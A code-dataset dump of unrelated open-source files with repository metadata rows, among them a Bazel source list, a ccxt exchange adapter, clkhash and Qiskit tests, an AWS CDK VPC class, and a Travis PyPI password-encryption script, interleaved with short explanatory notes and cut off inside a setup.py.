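Ruidl._download_file() above avoids saving the same media twice by hashing the downloaded payload with MD5 and checking the digest against a set of known checksums. A standard-library sketch of that de-duplication idea (function and variable names are illustrative):

```python
# Hedged sketch of the checksum-based de-duplication used by _download_file():
# hash the payload, skip it if the digest has been seen before.
import hashlib

seen_checksums = set()

def is_duplicate(payload: bytes) -> bool:
    digest = hashlib.md5(payload).hexdigest()
    if digest in seen_checksums:
        return True
    seen_checksums.add(digest)
    return False

print(is_duplicate(b"cat picture bytes"))   # False, first time seen
print(is_duplicate(b"cat picture bytes"))   # True, same content again
```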
| a08f64cd508c405efdf4cbebe1afbd3d8c64b7a1 | 3,323 | bzl | Python | google/cloud/google_cloud_cpp_common.bzl | shaffeeullah/google-cloud-cpp | 07396e652e8d738fd51ddd0bbeb04b4ab02ca267 | ["Apache-2.0"] | null | null | null | google/cloud/google_cloud_cpp_common.bzl | shaffeeullah/google-cloud-cpp | 07396e652e8d738fd51ddd0bbeb04b4ab02ca267 | ["Apache-2.0"] | null | null | null | google/cloud/google_cloud_cpp_common.bzl | shaffeeullah/google-cloud-cpp | 07396e652e8d738fd51ddd0bbeb04b4ab02ca267 | ["Apache-2.0"] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# DO NOT EDIT -- GENERATED BY CMake -- Change the CMakeLists.txt file if needed
"""Automatically generated source lists for google_cloud_cpp_common - DO NOT EDIT."""
google_cloud_cpp_common_hdrs = [
"backoff_policy.h",
"common_options.h",
"credentials.h",
"future.h",
"future_generic.h",
"future_void.h",
"iam_binding.h",
"iam_bindings.h",
"iam_policy.h",
"internal/absl_str_cat_quiet.h",
"internal/absl_str_join_quiet.h",
"internal/absl_str_replace_quiet.h",
"internal/algorithm.h",
"internal/api_client_header.h",
"internal/attributes.h",
"internal/backoff_policy.h",
"internal/base64_transforms.h",
"internal/big_endian.h",
"internal/build_info.h",
"internal/compiler_info.h",
"internal/credentials_impl.h",
"internal/diagnostics_pop.inc",
"internal/diagnostics_push.inc",
"internal/disable_deprecation_warnings.inc",
"internal/disable_msvc_crt_secure_warnings.inc",
"internal/filesystem.h",
"internal/format_time_point.h",
"internal/future_base.h",
"internal/future_fwd.h",
"internal/future_impl.h",
"internal/future_then_impl.h",
"internal/future_then_meta.h",
"internal/getenv.h",
"internal/invoke_result.h",
"internal/ios_flags_saver.h",
"internal/log_impl.h",
"internal/pagination_range.h",
"internal/parse_rfc3339.h",
"internal/port_platform.h",
"internal/random.h",
"internal/retry_policy.h",
"internal/setenv.h",
"internal/strerror.h",
"internal/throw_delegate.h",
"internal/tuple.h",
"internal/type_list.h",
"internal/user_agent_prefix.h",
"internal/utility.h",
"internal/version_info.h",
"kms_key_name.h",
"log.h",
"optional.h",
"options.h",
"polling_policy.h",
"project.h",
"status.h",
"status_or.h",
"stream_range.h",
"terminate_handler.h",
"tracing_options.h",
"version.h",
]
google_cloud_cpp_common_srcs = [
"credentials.cc",
"iam_bindings.cc",
"iam_policy.cc",
"internal/api_client_header.cc",
"internal/backoff_policy.cc",
"internal/base64_transforms.cc",
"internal/compiler_info.cc",
"internal/credentials_impl.cc",
"internal/filesystem.cc",
"internal/format_time_point.cc",
"internal/future_impl.cc",
"internal/getenv.cc",
"internal/log_impl.cc",
"internal/parse_rfc3339.cc",
"internal/random.cc",
"internal/retry_policy.cc",
"internal/setenv.cc",
"internal/strerror.cc",
"internal/throw_delegate.cc",
"internal/user_agent_prefix.cc",
"kms_key_name.cc",
"log.cc",
"options.cc",
"project.cc",
"status.cc",
"terminate_handler.cc",
"tracing_options.cc",
"version.cc",
]
| 29.40708 | 85 | 0.683419 |
| 493c85b37c20d135f0dc051cc64b9b6479d6c563 | 64 | py | Python | Task/Arrays/Python/arrays-3.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | ["Info-ZIP"] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Arrays/Python/arrays-3.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | ["Info-ZIP"] | null | null | null | Task/Arrays/Python/arrays-3.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | ["Info-ZIP"] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z |
myArray = [[0] * width] * height # DOES NOT WORK AS INTENDED!!!
| 32 | 63 | 0.625 |
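The one-liner above is RosettaCode's deliberate counter-example: multiplying the outer list copies references to a single inner list, so every row aliases the same object. A short demonstration of the pitfall and the usual fix with a list comprehension:

```python
# Why the snippet above "DOES NOT WORK AS INTENDED": the outer * replicates a
# reference to one inner list, so mutating one row mutates them all.
width, height = 3, 2

aliased = [[0] * width] * height
aliased[0][0] = 99
print(aliased)            # [[99, 0, 0], [99, 0, 0]] -- both rows changed

independent = [[0] * width for _ in range(height)]
independent[0][0] = 99
print(independent)        # [[99, 0, 0], [0, 0, 0]] -- only the first row changed
```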
| 35c24b12f13b68cc002d7f4dc94f45a3d224501c | 351 | py | Python | arxiv_cli/utils.py | jacquerie/arxiv-cli | ba07ba0f2a6ade3fbb2a9b87e79437e55a2fab17 | ["MIT"] | 8 | 2017-10-22T15:49:48.000Z | 2020-07-31T22:31:42.000Z | arxiv_cli/utils.py | jacquerie/arxiv-cli | ba07ba0f2a6ade3fbb2a9b87e79437e55a2fab17 | ["MIT"] | 2 | 2017-10-22T12:32:26.000Z | 2017-10-22T17:30:27.000Z | arxiv_cli/utils.py | jacquerie/arxiv-cli | ba07ba0f2a6ade3fbb2a9b87e79437e55a2fab17 | ["MIT"] | 1 | 2018-02-18T16:28:48.000Z | 2018-02-18T16:28:48.000Z |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from time import sleep
def drip(f, l, t=0):
result = []
if l:
for el in l[:-1]:
result.append(f(el))
sleep(t)
result.append(f(l[-1]))
return result
def has(d, k):
return k in d and d[k] is not None
| 15.954545 | 64 | 0.555556 |
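A usage sketch for the two helpers above, assuming the file is importable as arxiv_cli.utils: drip() maps f over a list while sleeping t seconds between elements (but not after the last one), and has() checks that a key is present and not None:

```python
# Usage sketch; the import path is an assumption based on the repo path above.
from arxiv_cli.utils import drip, has

print(drip(str.upper, ['a', 'b', 'c'], t=0))     # ['A', 'B', 'C']
print(has({'page': 2, 'query': None}, 'page'))   # True
print(has({'page': 2, 'query': None}, 'query'))  # False
```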
| c843d706a2d39173c8800fe8938fede5cd92ace3 | 10,576 | py | Python | python/ccxt/async_support/luno.py | KaceyBolman/ccxt | d34a0651b209ac77453f05c4ce31883f0cd2d6b8 | ["MIT"] | 1 | 2017-10-16T01:59:45.000Z | 2017-10-16T01:59:45.000Z | python/ccxt/async_support/luno.py | rerefreshing/ccxt | 7c50f338dcb282c0aee4d69a1ac4ca47255fdf15 | ["MIT"] | null | null | null | python/ccxt/async_support/luno.py | rerefreshing/ccxt | 7c50f338dcb282c0aee4d69a1ac4ca47255fdf15 | ["MIT"] | 2 | 2019-03-14T15:17:46.000Z | 2019-09-08T19:26:04.000Z |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import base64
from ccxt.base.errors import ExchangeError
class luno (Exchange):
def describe(self):
return self.deep_extend(super(luno, self).describe(), {
'id': 'luno',
'name': 'luno',
'countries': ['GB', 'SG', 'ZA'],
'rateLimit': 10000,
'version': '1',
'has': {
'CORS': False,
'fetchTickers': True,
'fetchOrder': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766607-8c1a69d8-5ede-11e7-930c-540b5eb9be24.jpg',
'api': 'https://api.mybitx.com/api',
'www': 'https://www.luno.com',
'doc': [
'https://www.luno.com/en/api',
'https://npmjs.org/package/bitx',
'https://github.com/bausmeier/node-bitx',
],
},
'api': {
'public': {
'get': [
'orderbook',
'ticker',
'tickers',
'trades',
],
},
'private': {
'get': [
'accounts/{id}/pending',
'accounts/{id}/transactions',
'balance',
'fee_info',
'funding_address',
'listorders',
'listtrades',
'orders/{id}',
'quotes/{id}',
'withdrawals',
'withdrawals/{id}',
],
'post': [
'accounts',
'postorder',
'marketorder',
'stoporder',
'funding_address',
'withdrawals',
'send',
'quotes',
'oauth2/grant',
],
'put': [
'quotes/{id}',
],
'delete': [
'quotes/{id}',
'withdrawals/{id}',
],
},
},
})
async def fetch_markets(self):
markets = await self.publicGetTickers()
result = []
for p in range(0, len(markets['tickers'])):
market = markets['tickers'][p]
id = market['pair']
base = id[0:3]
quote = id[3:6]
base = self.common_currency_code(base)
quote = self.common_currency_code(quote)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetBalance()
balances = response['balance']
result = {'info': response}
for b in range(0, len(balances)):
balance = balances[b]
currency = self.common_currency_code(balance['asset'])
reserved = float(balance['reserved'])
unconfirmed = float(balance['unconfirmed'])
account = {
'free': 0.0,
'used': self.sum(reserved, unconfirmed),
'total': float(balance['balance']),
}
account['free'] = account['total'] - account['used']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
orderbook = await self.publicGetOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = orderbook['timestamp']
return self.parse_order_book(orderbook, timestamp, 'bids', 'asks', 'price', 'volume')
def parse_order(self, order, market=None):
timestamp = order['creation_timestamp']
status = 'open' if (order['state'] == 'PENDING') else 'closed'
side = 'sell' if (order['type'] == 'ASK') else 'buy'
symbol = None
if market:
symbol = market['symbol']
price = self.safe_float(order, 'limit_price')
amount = self.safe_float(order, 'limit_volume')
quoteFee = self.safe_float(order, 'fee_counter')
baseFee = self.safe_float(order, 'fee_base')
fee = {'currency': None}
if quoteFee:
fee['side'] = 'quote'
fee['cost'] = quoteFee
else:
fee['side'] = 'base'
fee['cost'] = baseFee
return {
'id': order['order_id'],
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': None,
'side': side,
'price': price,
'amount': amount,
'filled': None,
'remaining': None,
'trades': None,
'fee': fee,
'info': order,
}
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
response = await self.privateGetOrdersId(self.extend({
'id': id,
}, params))
return self.parse_order(response)
def parse_ticker(self, ticker, market=None):
timestamp = ticker['timestamp']
symbol = None
if market:
symbol = market['symbol']
last = self.safe_float(ticker, 'last_trade')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': self.safe_float(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_float(ticker, 'ask'),
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'rolling_24_hour_volume'),
'quoteVolume': None,
'info': ticker,
}
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
response = await self.publicGetTickers(params)
tickers = self.index_by(response['tickers'], 'pair')
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = self.markets_by_id[id]
symbol = market['symbol']
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
ticker = await self.publicGetTicker(self.extend({
'pair': market['id'],
}, params))
return self.parse_ticker(ticker, market)
def parse_trade(self, trade, market):
side = 'buy' if (trade['is_buy']) else 'sell'
return {
'info': trade,
'id': None,
'order': None,
'timestamp': trade['timestamp'],
'datetime': self.iso8601(trade['timestamp']),
'symbol': market['symbol'],
'type': None,
'side': side,
'price': self.safe_float(trade, 'price'),
'amount': self.safe_float(trade, 'volume'),
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
if since is not None:
request['since'] = since
response = await self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response['trades'], market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
method = 'privatePost'
order = {'pair': self.market_id(symbol)}
if type == 'market':
method += 'Marketorder'
order['type'] = side.upper()
if side == 'buy':
order['counter_volume'] = amount
else:
order['base_volume'] = amount
else:
method += 'Postorder'
order['volume'] = amount
order['price'] = price
if side == 'buy':
order['type'] = 'BID'
else:
order['type'] = 'ASK'
response = await getattr(self, method)(self.extend(order, params))
return {
'info': response,
'id': response['order_id'],
}
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
return await self.privatePostStoporder({'order_id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if query:
url += '?' + self.urlencode(query)
if api == 'private':
self.check_required_credentials()
auth = self.encode(self.apiKey + ':' + self.secret)
auth = base64.b64encode(auth)
headers = {'Authorization': 'Basic ' + self.decode(auth)}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
async def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = await self.fetch2(path, api, method, params, headers, body)
if 'error' in response:
raise ExchangeError(self.id + ' ' + self.json(response))
return response
| 36.095563 | 126 | 0.480144 |
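luno.sign() above authenticates private calls by base64-encoding "apiKey:secret" into an HTTP Basic Authorization header. A standard-library sketch of that header construction (the credentials are placeholders):

```python
# Standard-library sketch of the Basic auth header built by luno.sign() above.
import base64

api_key, secret = 'my-key-id', 'my-key-secret'
token = base64.b64encode('{}:{}'.format(api_key, secret).encode()).decode()
headers = {'Authorization': 'Basic ' + token}
print(headers['Authorization'].startswith('Basic '))   # True
```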
| a47741d10ccb29ce36cf1b59f10e6b6ef47e73e4 | 7,251 | py | Python | tests/test_schema.py | hardbyte/clkhash | b118269a6db3f42f9967786c417a3f03adda125c | ["Apache-2.0"] | null | null | null | tests/test_schema.py | hardbyte/clkhash | b118269a6db3f42f9967786c417a3f03adda125c | ["Apache-2.0"] | null | null | null | tests/test_schema.py | hardbyte/clkhash | b118269a6db3f42f9967786c417a3f03adda125c | ["Apache-2.0"] | null | null | null |
from __future__ import unicode_literals
import io
import json
import os
import unittest
from clkhash import schema
from clkhash.schema import SchemaError, MasterSchemaError
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__),
'..', 'clkhash', 'data')
TEST_DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'testdata')
def _test_data_file_path(file_name):
return os.path.join(TEST_DATA_DIRECTORY, file_name)
def _schema_dict(dir_name, file_name):
with open(os.path.join(dir_name, file_name)) as f:
return json.load(f)
class TestSchemaValidation(unittest.TestCase):
def test_good_schema(self):
# These are some perfectly fine schemas.
with open(_test_data_file_path('good-schema-v1.json')) as f:
schema.from_json_file(f)
def test_good_schema_repr(self):
with open(_test_data_file_path('good-schema-v1.json')) as f:
s = schema.from_json_file(f)
schema_repr = repr(s)
assert "v2" in schema_repr # v1 schema is converted to v2
assert "12 fields" in schema_repr
def test_invalid_schema(self):
# This schema is not valid (missing encoding in its feature).
with open(_test_data_file_path('bad-schema-v1.json')) as f:
with self.assertRaises(SchemaError):
schema.from_json_file(f)
def test_valid_but_unsupported_schema(self):
# This schema has an unsupported version.
with open(_test_data_file_path(
'good-but-unsupported-schema-v1.json')) as f:
with self.assertRaises(SchemaError):
schema.from_json_file(f)
def test_invalid_json_schema(self):
invalid_schema_file = io.StringIO('{') # Invalid json.
msg = 'Invalid JSON in schema should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_list_schema(self):
invalid_schema_file = io.StringIO('[]') # Must be dict instead.
msg = 'List as top element should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_string_schema(self):
invalid_schema_file = io.StringIO('"foo"') # Must be dict.
msg = 'Literal as top element should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_no_version(self):
invalid_schema_file = io.StringIO('{}') # Missing version.
msg = 'Schema with no version should raise SchemaError.'
with self.assertRaises(SchemaError, msg=msg):
schema.from_json_file(invalid_schema_file)
def test_missing_master(self):
# This shouldn't happen but we need to be able to handle it if,
# for example, we have a corrupt install.
original_paths = schema.MASTER_SCHEMA_FILE_NAMES
schema.MASTER_SCHEMA_FILE_NAMES = {1: 'nonexistent.json'}
msg = 'Missing master schema should raise MasterSchemaError.'
with self.assertRaises(MasterSchemaError, msg=msg):
schema.validate_schema_dict({'version': 1})
schema.MASTER_SCHEMA_FILE_NAMES = original_paths
def test_convert_v1_to_v2(self):
schema_v1 = _schema_dict(DATA_DIRECTORY, 'randomnames-schema.json')
schema.validate_schema_dict(schema_v1)
schema_v2 = schema.convert_v1_to_v2(schema_v1)
schema.validate_schema_dict(schema_v2)
def test_good_schema2_repr(self):
with open(_test_data_file_path('good-schema-v2.json')) as f:
s = schema.from_json_file(f)
schema_repr = repr(s)
assert "v2" in schema_repr
assert "12 fields" in schema_repr
class TestSchemaLoading(unittest.TestCase):
def test_issue_111(self):
schema_dict = {
'version': 1,
'clkConfig': {
'l': 1024,
'k': 20,
'hash': {
'type': 'doubleHash'},
'kdf': {
'type': 'HKDF'}},
'features': [
{
'identifier': 'rec_id',
'ignored': True},
{
'identifier': 'given_name',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'surname',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'street_number',
'format': {
'type': 'integer'},
'hashing': {
'ngram': 1,
'positional': True,
'weight': 1 }},
{
'identifier': 'address_1',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'address_2',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'suburb',
'format': {
'type': 'string',
'encoding': 'utf-8'},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'postcode',
'format': {
'type': 'integer',
'minimum': 1000,
'maximum': 9999},
'hashing': {
'ngram': 1,
'positional': True,
'weight': 1}},
{
'identifier': 'state',
'format': {
'type': 'string',
'encoding': 'utf-8',
'maxLength': 3},
'hashing': {
'ngram': 2,
'weight': 1}},
{
'identifier': 'day_of_birth',
'format': {
'type': 'integer'},
'hashing': {
'ngram': 1,
'positional': True,
'weight': 1}},
{
'identifier': 'soc_sec_id',
'ignored': True}
]
}
# This fails in #111. Now it shouldn't.
schema.from_json_dict(schema_dict)
| 36.621212 | 75 | 0.481313 |
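The tests above repeatedly use assertRaises as a context manager on schemas fed in through io.StringIO. A generic, clkhash-free sketch of the same test pattern using only the standard library:

```python
# Generic sketch of the test pattern used above: feed a deliberately broken input
# through io.StringIO and assert that parsing it raises.
import io
import json
import unittest

class TestInvalidJson(unittest.TestCase):
    def test_invalid_json(self):
        broken = io.StringIO('{')          # truncated JSON document
        msg = 'Invalid JSON should raise JSONDecodeError.'
        with self.assertRaises(json.JSONDecodeError, msg=msg):
            json.load(broken)

if __name__ == '__main__':
    unittest.main()
```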
| c5c4dca5e475665cd860725ae4c757cdcf07464c | 1,845 | py | Python | test/python/circuit/test_circuit_multi_registers.py | ismaila-at-za-ibm/qiskit-terra | 08303ec98ac7b33fde55266dc3a74466fbdcae95 | ["Apache-2.0"] | 1 | 2020-09-03T12:28:44.000Z | 2020-09-03T12:28:44.000Z | test/python/circuit/test_circuit_multi_registers.py | ismaila-at-za-ibm/qiskit-terra | 08303ec98ac7b33fde55266dc3a74466fbdcae95 | ["Apache-2.0"] | null | null | null | test/python/circuit/test_circuit_multi_registers.py | ismaila-at-za-ibm/qiskit-terra | 08303ec98ac7b33fde55266dc3a74466fbdcae95 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=unused-import
# pylint: disable=redefined-builtin
"""Test Qiskit's QuantumCircuit class for multiple registers."""
import os
import tempfile
import unittest
from qiskit import QuantumRegister, ClassicalRegister, QuantumCircuit
from qiskit import QiskitError
from qiskit.converters.circuit_to_dag import circuit_to_dag
from qiskit.test import QiskitTestCase
class TestCircuitMultiRegs(QiskitTestCase):
"""QuantumCircuit Qasm tests."""
def test_circuit_multi(self):
"""Test circuit multi regs declared at start.
"""
qreg0 = QuantumRegister(2, 'q0')
creg0 = ClassicalRegister(2, 'c0')
qreg1 = QuantumRegister(2, 'q1')
creg1 = ClassicalRegister(2, 'c1')
circ = QuantumCircuit(qreg0, qreg1)
circ.x(qreg0[1])
circ.x(qreg1[0])
meas = QuantumCircuit(qreg0, qreg1, creg0, creg1)
meas.measure(qreg0, creg0)
meas.measure(qreg1, creg1)
qc = circ + meas
circ2 = QuantumCircuit()
circ2.add_register(qreg0)
circ2.add_register(qreg1)
circ2.x(qreg0[1])
circ2.x(qreg1[0])
meas2 = QuantumCircuit()
meas2.add_register(qreg0)
meas2.add_register(qreg1)
meas2.add_register(creg0)
meas2.add_register(creg1)
meas2.measure(qreg0, creg0)
meas2.measure(qreg1, creg1)
qc2 = circ2 + meas2
dag_qc = circuit_to_dag(qc)
dag_qc2 = circuit_to_dag(qc2)
dag_circ2 = circuit_to_dag(circ2)
dag_circ = circuit_to_dag(circ)
self.assertEqual(dag_qc, dag_qc2)
self.assertEqual(dag_circ, dag_circ2)
| 27.954545 | 77 | 0.663415 |
| c4acf9be2b29cf8f4c1e94757394268d98c28766 | 987 | py | Python | transit-gw-example/transitgw/public_vpc.py | philbasford/adv_networking_demos | 4d00cdbcdc563434f9e57bcb27217ee0d8b787be | ["Apache-2.0"] | 1 | 2021-07-17T09:43:21.000Z | 2021-07-17T09:43:21.000Z | transit-gw-example/transitgw/public_vpc.py | philbasford/adv_networking_demos | 4d00cdbcdc563434f9e57bcb27217ee0d8b787be | ["Apache-2.0"] | null | null | null | transit-gw-example/transitgw/public_vpc.py | philbasford/adv_networking_demos | 4d00cdbcdc563434f9e57bcb27217ee0d8b787be | ["Apache-2.0"] | null | null | null |
"""The following file is released under the Apache 2 Licence, see LICENCE.txt."""
from aws_cdk import (
aws_ec2 as ec2,
core as cdk
)
from transitgw.jump_server import JumpServer
class PublicVPC(ec2.Vpc):
"""A VPC that only contains 3 public subnets with not NATs but does contain a IGW.
Args:
ec2 ([type]): The base VPC class that we will extend to customise the VPC
"""
def __init__(self, stack: cdk.Stack, prefix, cidr, **kwargs) -> None:
super().__init__(
stack,
id=prefix,
cidr=cidr,
enable_dns_hostnames=True,
enable_dns_support=True,
nat_gateways=0,
subnet_configuration=[
ec2.SubnetConfiguration(
name='public-subnet',
subnet_type=ec2.SubnetType.PUBLIC,
cidr_mask=24
)
],
max_azs=3
)
JumpServer(stack, prefix, self)
| 26.675676 | 86 | 0.561297 |
| 9e10bb9700c3b1ca49e99f5c08f8c1f9ae30051b | 4,084 | py | Python | travis_pypi_setup.py | vilkasgroup/epages_client | 10e63d957ee45dc5d4df741064806f724fb1be1f | ["MIT"] | 3 | 2018-01-26T13:44:26.000Z | 2020-05-13T13:58:19.000Z | travis_pypi_setup.py | vilkasgroup/epages_client | 10e63d957ee45dc5d4df741064806f724fb1be1f | ["MIT"] | 53 | 2018-02-05T10:59:22.000Z | 2022-01-01T19:31:08.000Z | travis_pypi_setup.py | vilkasgroup/epages_client | 10e63d957ee45dc5d4df741064806f724fb1be1f | ["MIT"] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update encrypted deploy password in Travis config file."""
from __future__ import print_function
import base64
import json
import os
from getpass import getpass
import yaml
from cryptography.hazmat.primitives.serialization import load_pem_public_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
GITHUB_REPO = 'vilkasgroup/epages_client'
TRAVIS_CONFIG_FILE = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.travis.yml')
def load_key(pubkey):
"""Load public RSA key.
Work around keys with incorrect header/footer format.
Read more about RSA encryption with cryptography:
https://cryptography.io/latest/hazmat/primitives/asymmetric/rsa/
"""
try:
return load_pem_public_key(pubkey.encode(), default_backend())
except ValueError:
# workaround for https://github.com/travis-ci/travis-api/issues/196
pubkey = pubkey.replace('BEGIN RSA', 'BEGIN').replace('END RSA', 'END')
return load_pem_public_key(pubkey.encode(), default_backend())
def encrypt(pubkey, password):
"""Encrypt password using given RSA public key and encode it with base64.
The encrypted password can only be decrypted by someone with the
private key (in this case, only Travis).
"""
key = load_key(pubkey)
encrypted_password = key.encrypt(password, PKCS1v15())
return base64.b64encode(encrypted_password)
def fetch_public_key(repo):
"""Download RSA public key Travis will use for this repo.
Travis API docs: http://docs.travis-ci.com/api/#repository-keys
"""
keyurl = 'https://api.travis-ci.org/repos/{0}/key'.format(repo)
data = json.loads(urlopen(keyurl).read().decode())
if 'key' not in data:
errmsg = "Could not find public key for repo: {}.\n".format(repo)
errmsg += "Have you already added your GitHub repo to Travis?"
raise ValueError(errmsg)
return data['key']
def prepend_line(filepath, line):
"""Rewrite a file adding a line to its beginning."""
with open(filepath) as f:
lines = f.readlines()
lines.insert(0, line)
with open(filepath, 'w') as f:
f.writelines(lines)
def load_yaml_config(filepath):
"""Load yaml config file at the given path."""
with open(filepath) as f:
return yaml.load(f)
def save_yaml_config(filepath, config):
"""Save yaml config file at the given path."""
with open(filepath, 'w') as f:
yaml.dump(config, f, default_flow_style=False)
def update_travis_deploy_password(encrypted_password):
"""Put `encrypted_password` into the deploy section of .travis.yml."""
config = load_yaml_config(TRAVIS_CONFIG_FILE)
config['deploy']['password'] = dict(secure=encrypted_password)
save_yaml_config(TRAVIS_CONFIG_FILE, config)
line = ('# This file was autogenerated and will overwrite'
' each time you run travis_pypi_setup.py\n')
prepend_line(TRAVIS_CONFIG_FILE, line)
def main(args):
"""Add a PyPI password to .travis.yml so that Travis can deploy to PyPI.
Fetch the Travis public key for the repo, and encrypt the PyPI password
with it before adding, so that only Travis can decrypt and use the PyPI
password.
"""
public_key = fetch_public_key(args.repo)
password = args.password or getpass('PyPI password: ')
update_travis_deploy_password(encrypt(public_key, password.encode()))
print("Wrote encrypted password to .travis.yml -- you're ready to deploy")
if '__main__' == __name__:
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--repo', default=GITHUB_REPO,
help='GitHub repo (default: %s)' % GITHUB_REPO)
parser.add_argument('--password',
help='PyPI password (will prompt if not provided)')
args = parser.parse_args()
main(args)
| 31.90625 | 79 | 0.701273 |
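prepend_line() above rewrites a file with an extra line at the top, which the script uses to stamp .travis.yml as autogenerated. A usage sketch against a throwaway temp file; the helper is restated with the same logic so the snippet is self-contained:

```python
# Usage sketch for the prepend_line() idea above, run against a temp file so it
# is safe to execute anywhere.
import os
import tempfile

def prepend_line(filepath, line):
    """Rewrite a file adding a line to its beginning (same logic as above)."""
    with open(filepath) as f:
        lines = f.readlines()
    lines.insert(0, line)
    with open(filepath, 'w') as f:
        f.writelines(lines)

fd, path = tempfile.mkstemp(suffix='.yml')
with os.fdopen(fd, 'w') as f:
    f.write('deploy:\n  provider: pypi\n')
prepend_line(path, '# autogenerated header\n')
with open(path) as f:
    print(f.read().splitlines()[0])   # '# autogenerated header'
os.remove(path)
```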
| 858e9424f3e9281d8c2a7bc3f08490974af3eb1c | 3,981 | py | Python | setup.py | PierreARM/lisa | e9cfbd63b25821518f1254ed7905b505a5073450 | ["Apache-2.0"] | null | null | null | setup.py | PierreARM/lisa | e9cfbd63b25821518f1254ed7905b505a5073450 | ["Apache-2.0"] | null | null | null | setup.py | PierreARM/lisa | e9cfbd63b25821518f1254ed7905b505a5073450 | ["Apache-2.0"] | null | null | null |
#! /usr/bin/env python3
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2018, Arm Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import itertools
from setuptools import setup, find_namespace_packages
with open('README.rst', 'r') as f:
long_description = f.read()
with open('LICENSE.txt', 'r') as f:
license_txt = f.read()
with open("lisa/version.py") as f:
version_globals = dict()
exec(f.read(), version_globals)
lisa_version = version_globals['__version__']
packages = find_namespace_packages(where='lisa', include=['lisa*'])
package_data = {
package: ['*']
for package in packages
if package.startswith('lisa.assets.')
}
package_data['lisa.assets'] = ['*']
extras_require={
"notebook": [
"jupyterlab",
"ipympl", # For %matplotlib widget under jupyter lab
"sphobjinv", # To open intersphinx inventories
],
"test": [
"pytest",
],
"wa": [
"wlauto",
],
}
extras_require["doc"] = [
"sphinx >= 1.8",
